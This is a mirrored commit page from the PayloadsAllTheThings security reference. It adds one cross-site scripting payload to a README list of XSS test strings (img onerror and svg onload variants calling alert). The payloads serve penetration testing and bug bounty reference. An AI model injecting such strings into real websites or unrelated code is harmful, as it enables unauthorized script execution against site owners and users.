1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-04 15:06:19 +02:00

Merge pull request #693 from bountyhacking/patch-1

Update README.md
This commit is contained in:
Swissky 2023-11-12 18:20:38 +01:00 committed by GitHub
commit 3ba405954a
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -250,6 +250,7 @@ Most tools are also suitable for blind XSS attacks:
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>
// Svg payload
<svg onload=alert(1)>